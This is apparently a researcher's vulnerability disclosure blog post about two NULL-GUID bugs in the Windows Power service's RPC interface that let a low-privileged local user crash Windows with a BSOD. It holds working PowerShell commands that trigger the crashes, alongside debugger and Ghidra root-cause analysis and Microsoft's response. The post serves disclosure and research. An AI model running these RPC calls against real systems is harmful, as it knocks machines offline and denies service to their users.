Post

Unplugging your Power service with my special GUID

Crashing Windows by exploiting two vulnerabilities in the power service

Unplugging your Power service with my special GUID

During my research into MS-RPC (Microsoft Remote Procedure Call), I stumbled upon two RPC calls that can crash the Power service in Windows. Both calls take among others an GUID as parameter. When specifying a NULL value for the GUID when invoking the RPC call, the Power service crashes and causes an BSOD.

One of the RPC calls, UmpoRpcReadProfileAlias, only works on Windows-11 based systems, so Windows 11, Windows server 2025, etc. The other call, UmpoRpcReadFromUserPowerKey, was tested successfully against Windows-10 systems as well. Any user can invoke the RPC calls.

The impact is that an low privileged user is able to DoS a Windows client or server by crashing the Power service that results in an BSOD. The Power service cannot be turned off because it is a core system service responsible for managing power settings, battery status, and power policies. Windows does not allow stopping or disabling it through Services (services.msc) or via command-line tools like sc config or net stop.

Discovering the vulnerability

I have started developing a fuzzer to make it easier to research MS-RPC using an automated approach. It uses NtObjectManager to generate RPC clients to interact with RPC servers. By using these clients, we can invoke the RPC interface’s their methods. This led to the idea of creating a fuzzer that can automatically send random inputs to RPC servers. This fuzzer is still in development, and this fuzzer will also not be the focus for this blogpost.

While fuzzing the RPC implementation of C:\Windows\System32\umpo.dll, the system suddently crashed and caused the following BSOD:

BSOD shows that a critical process died (don't ask me why it is green) BSOD shows that a critical process died (don’t ask me why it is green)

Finding the responsible RPC call

The fuzzer keeps a logfile of RPC calls that it is going to invoke before invoking them. The last line of the logfile before crashing the system noted:

1
2
3
4
RPCserver: umpo.dll 
Procedure: UmpoRpcReadProfileAlias
Params: , System.Byte[], 1001337
------------------------

Manually reproducing the RPC call

With this information, we can now use NtObjectManager to manually reproduce the RPC call. We can create a RPC client from where we can view the vulnerable method and it’s parameters:

1
2
3
$rpcinterfaces = "C:\windows\system32\umpo.dll" | Get-RpcServer
$client = $rpcinterfaces | Get-RpcClient
$client | gm | Where-Object { $_.Name -eq 'UmpoRpcReadProfileAlias' } | fl

Output:

Output of the definition for the RPC method UmpoRpcReadProfileAlias Output of the definition for the RPC method UmpoRpcReadProfileAlias

It has the following defintion:

1
UmpoRpcReadProfileAlias(System.Nullable[guid] p0, byte[] p1, int p2)

To manually invoke the RPC call, we need to define a parameter type for System.Nullable[guid] and byte[] as follows:

We start by creating a Byte array with just random inputs:

1
$bytearray = ([System.Text.Encoding]::UTF8.GetBytes("incendiumrocks"))

If we take another look at the last lines of the logfile, we can see what parameters it used to cause the BSOD. The first parameter (for the System.Nullable[guid]), shows an empty value. Which most likely is NULL. So why was it NULL?

The fuzzer uses an activator to dynamically create instances for complex parameters like Struct or GUID. And since this parameter is Nullable, it initiated $Null as value.

1
2
3
$method = $client.GetType().GetMethods() |? { $_.Name -eq 'UmpoRpcReadProfileAlias' }
$p0 = $method.GetParameters()[0]
$guid = [Activator]::CreateInstance($p0.ParameterType)

We can see that the GUID now is equal to NULL:

1
2
$guid -eq $Null
True

Now we can invoke the RPC call just as the fuzzer did:

1
$client.UmpoRpcReadProfileAlias($guid,$bytearray,1001337)

Which causes the BSOD again:

BSOD shows that a critical process died BSOD shows that a critical process died

Root cause analysis

If we take a look at the parameter values for the vulnerable method, we can clearly see that the GUID is nullable:

1
UmpoRpcReadProfileAlias(System.Nullable[guid] p0, byte[] p1, int p2)

This means that it is not necessary to provide an GUID and that if it is not specified, it will default to NULL. If we specify $Null instead of our $GUID the system also crashes, which is what we expected since both are exactly the same.

Attaching a debugger

To see what is going on, we can attach Windbg to the Power process. Why the Power process? Well the umpo.dll has this as file description: User-mode Power Service.

When invoking the RPC call with the NULL value for the GUID, the debugger catches an access violation: Windbg shows access violation when invoking the RPC call with a NULL value Windbg shows access violation when invoking the RPC call with a NULL value

Taking a look at the call stack, we can see it crashes on RtlStringFromGUIDEx Windbg call stack Windbg call stack

Let’s take a look at the register values as well

Register values at the crash Register values at the crash

The instruction loads a byte (8-bit value) from memory at rbx + 0x0E into ecx, and fills the upper 24 bits of ecx with zeros. ds:00000000'0000000e=?? indicates that the memory at rbx + 0x0E is uninitialized or invalid, leading to a crash (access violation) if the pointer rbx is incorrect.

Let’s parse a valid GUID and compare the output in Windbg. We first set an breakpoint at the RtlStringFromGUIDEx instruction.

1
bp !ntdll!RtlStringFromGUIDEx+0x3d

And we create a valid GUID in PowerShell:

1
2
3
4
5
6
$guid = [Guid]::NewGuid()
$guid

Guid
----
c97a92f2-3e2c-4344-b1d5-4836f00cd959

We invoke the RPC call and the breakpoint gets hit in Windbg. Breakpoint RtlStringFromGUIDEx gets hit Breakpoint RtlStringFromGUIDEx gets hit

Taking a look at the registers, we can now see that RBX is 0000026897240004:

Register values for valid GUID Register values for valid GUID

If we continue the debugger we can see that the RPC call now gets a valid return value:

RPC call returns a normal return value RPC call returns a normal return value

Reversing the function in Ghidra

To get a better understanding of the root cause, I reversed the function in Ghidra. The underneath code is not the direct output from Ghidra, but instead I reversed it to better understandable code.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
uint UmpoReadProfileAlias(guid, bytearray, longlong profileSize) {
    uint status;
    longlong registryHandle[2];
    UNICODE_STRING unicodeGuid;
    undefined8 unicodeBuffer;
    undefined8 unicodeBufferExtra;
    
    // Initialize the unicode string buffer
    unicodeBuffer = 0;
    unicodeBufferExtra = 0;
    
    // Check if the input profile size is zero
    if (profileSize == 0) {
        return ERROR_INVALID_PARAMETER;  // Equivalent to 0x57
    }
    
    registryHandle[0] = -1;
    
    // Check if the root key is invalid
    if (UmpoPpmProfileEventsRootKey == -1) {
        return ERROR_FILE_NOT_FOUND;  // Equivalent to 2
    }
    
    // Convert GUID to Unicode String
    RtlInitUnicodeString(&unicodeGuid, 0);
    status = RtlStringFromGUID(guid, &unicodeGuid);
    
    if (status == 0) {
        // Try opening the registry key
        status = RegOpenKeyExW(UmpoPpmProfileEventsRootKey, unicodeBufferExtra, 0, KEY_READ, registryHandle);
        
        if (status == 0) {
            // Query the registry value
            status = RegQueryValueExW(registryHandle[0], L"Name", 0, 0, bytearray, profileSize);
            
            // If query failed with an unexpected error, trigger telemetry
            if ((status & 0xfffffffd) != 0) {
                MicrosoftTelemetryAssertTriggeredNoArgs();
            }
        } else if (status != ERROR_FILE_NOT_FOUND) {
            // Trigger telemetry if the registry open operation failed with an unexpected error
            MicrosoftTelemetryAssertTriggeredNoArgs();
        }
    }
    
    // Free allocated Unicode string
    RtlFreeUnicodeString(&unicodeGuid);
    
    // Close the registry key if it was successfully opened
    if (registryHandle[0] != -1) {
        RegCloseKey(registryHandle[0]);
    }
    
    return status;
}

The function RtlStringFromGUID expects a valid GUID. If GUID is NULL, it causes an access violation (segmentation fault) when attempting to read or process it. The GUID is not checked and so a NULL is being parsed.

Another one

After excluding the UmpoReadProfileAlias RPC method and running the fuzzer again, it got another BSOD. Now the last lines of the logfile were:

1
2
3
4
RPCserver: umpo.dll 
Procedure: UmpoRpcReadFromUserPowerKey
Params: , , , 1001337, 1001337, System.Byte[], 1001337, 
------------------------

Okay, let’s take a look at the definition of the UmpoRpcReadFromUserPowerKey method:

1
UmpoRpcReadFromUserPowerKey(System.Nullable[guid] p0, System.Nullable[guid] p1, System.Nullable[guid] p2, int p3, int p4, byte[] p5, int p6, System.Nullable[NtCoreLib.Ndr.Marshal.NdrEnum16] p8)

This method also takes 3 System.Nullable[guid] parameters. To see which of the three causes the BSOD, we can manually try each Guid parameter with a NULL value:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$guid = [guid]"00000000-0000-0000-0000-000000000000"
$client.UmpoRpcReadFromUserPowerKey($guid,$guid,$guid,1001337,1001337,$bytearray,1001337,$complex)

p5                        p7 p8 retval
--                        -- -- ------
{105, 110, 99, 101} 1001337        87

$client.UmpoRpcReadFromUserPowerKey($guid,$guid,$null,1001337,1001337,$bytearray,1001337,$complex)

p5                        p7 p8 retval
--                        -- -- ------
{105, 110, 99, 101} 1001337        87

$client.UmpoRpcReadFromUserPowerKey($guid,$null,$null,1001337,1001337,$bytearray,1001337,$complex)

p5                        p7 p8 retval
--                        -- -- ------
{105, 110, 99, 101} 1001337        87

But when invoking the next RPC call (the first GUID also being NULL), then the system crashes:

1
$client.UmpoRpcReadFromUserPowerKey($null,$null,$null,1001337,1001337,$bytearray,1001337,$complex)

BSOD shows that a critical process died BSOD shows that a critical process died

Windbg

When invoking the RPC call, we see another access violation, but now for UmpoReadFromUserPowerKey

Windbg shows access violation for UmpoReadFromUserPowerKey Windbg shows access violation for UmpoReadFromUserPowerKey

The instruction at 0x00007ffac7178461 is trying to move a quadword (8 bytes) from the memory address pointed to r14 into rax. The memory at r14 is 00000000'00000000, meaning it’s a NULL pointer dereference. Since the mov instruction attempts to read from an invalid address, this results in an access violation.

Reversing in Ghidra

I was interested in why the second and third GUID parameters can be NULL but the first cannot. So I set the base address of umpo.dll and searched for the UmpoReadFromUserPowerKey function. Then I searched for the memory address at where the access violation in Windbg took place 0x00007ffac7178461.

Ghidra instruction that causes an access violation Ghidra instruction that causes an access violation

Interestingly, there is a conditional check for our firstguid:

Conditional check on firstguid Conditional check on firstguid

1
if ((PtrUmpoFullPowerPlanSupportDisabled != '\0') && (firstguid != (longlong *)0x0))

Somehow the firstguid is not equal to NULL here, else the “vulnerablefunction” would not be triggered. However, the pointer to the firstguid is not checked and is being dereferenced to lVar16:

1
2
3
if (param_4 != '\0') {
    lVar16 = *firstguid; // Causes the crash
}

The pointers for secondguid and thirdguid dont seem to get dereferenced in the program, which would explain why a NULL value for only the firstguid causes an crash.

Proof of Concepts

Using the fantastic tool NtObjectManager, we can format a RPC interface into an raw C# RPC client. This allows to use the client in .NET and invoke the RPC calls from an executable. Both the PoC for UmpoRpcReadProfileAlias and UmpoReadFromUserPowerKey can be found on GitHub.

UmpoRpcReadProfileAlias

  • Works against Windows 11, Windows Server 2025
  • RPC call not available on Windows 10

UmpoReadFromUserPowerKey

  • Successfully tested against Windows 10 and above
  • Successfully tested against Windows Server 2019 and above

Reporting to Microsoft

I reported both vulnerabilities to Microsoft and their response was: This does not pose an immediate threat and is of moderate severity, due to the fact this requires cold reboot or causes BSOD. This is local only as the code checks for remote RPC via UmpoIsClientLocal and bails if remote. We have shared the report with the team responsible for maintaining the product or service. They will review for a potential fix and take appropriate action as needed to help keep customers protected

Since the RPC calls cannot be exploited remotely through an named pipe, it is a moderate severity. Microsoft only takes immediate action for important/critical vulnerabilities. However, I hope that my detailed analysis help in creating a fix somewhere in the near future.

If the case gets resolved into a moderate or low issue, you are released from Microsoft’s CVD. However, this blogpost was also approved by Microsoft before publishing.

Credits and resources

I want to thank @FrankSpierings for the help on the root cause analysis and figuring out if we can further exploit the vulnerabilities then just DoS. I also want to thank @JamesForshaw for NtObjectManager.

Resources

This post is licensed under CC BY 4.0 by the author.